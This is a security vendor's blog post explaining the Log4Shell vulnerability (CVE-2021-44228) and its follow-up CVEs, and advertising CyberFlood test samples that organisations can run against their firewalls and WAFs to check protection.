English
This issue named Log4j vulnerability (also known as "Log4Shell") is tracked by CVE-2021-44228 on December 10. Log4j is a popular open-source Java logging library widely used, directly and indirectly used by one-third of servers on the Internet. The known affect many high demand and popular servers and services include Apache web servers, Apple iCloud, Twitter, Amazon, Microsoft, IBM, Oracle, Cisco, Google, Cloudflare, Minecraft game servers and many other services and content providers.
This vulnerability received a CVSS score of 10.0, the highest rated score, because of its simplicity to use and critical impact on many servers. An attacker simply sends a malicious logging string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing the attacker to take control and exploit the compromised system. This behavior is commonly known as Remote Command/Code Execution (RCE). Log4j 2.0 was released in July 2014 and has been downloaded over 400,000 times, just think how many software applications are using this log4j library.
Log4j developers have released 2.15 to address CVE-2021-44228. However, the fix for CVE-2021-44228 introduced two new problems tracked by CVE-2021-45046 on December 14 and CVE-2021-45105 on December 18. These CVEs are temporarily fixed with 2.16.0 and further fixed with 2.17.0 and other updates are expected.
What’s next?
Many attackers are running against time to use this powerful weapon. They have developed automated tools to scan the Internet and penetration vulnerabilities. In addition, hackers have added new capabilities into their APT toolsets.
On the other hand, application developers are racing to upgrade their solutions to the latest version of Log4j. However, it may not always be possible to upgrade and patch the code and it is going to take some time. In those instances, IT organizations will need to place security controls like NGFW, IPS or WAF in front of the vulnerable servers to prevent and block the attacks getting into the network.
Protecting users against vulnerabilities
To help users protect against this latest top-rated vulnerability, Spirent CyberFlood includes both CVE-2021-44228 and CVE-2021-45046 attack samples with the latest TestCloud update. These samples are available to current CyberFlood customers. CVE-2021-45105 will be available very soon.
Example of CyberFlood CyberThreat Assessment (CTA) call-flow between the hosts in the Log4j attack CVE-2021-44228
CIO and IT Departments can run these attacks against their NGFW or WAF to validate if their security infrastructures are updated to protect against Log4j threats:
If security devices cannot detect and alert on these two attacks, you must either contact your security vendors to upgrade to the latest threat intelligence or check with your www access logs to find if you have been attacked, check if any data is leaked outside or be planted some backdoor software
If security devices can detect and alert against these attacks, refer to our previous post to enable HTTPs and common evasions and test again
Log4j vulnerability impacts one-third of servers on the Internet. Not all companies can upgrade their system to the latest version to fix the issue promptly.
Spirent helps organizations verify their security controls/devices on physical on-premises or virtual on public cloud. All existing customers can access these new CVEs through TestCloud.
Contact us today to speak with a security expert on best ways to address this latest top-rated vulnerability.
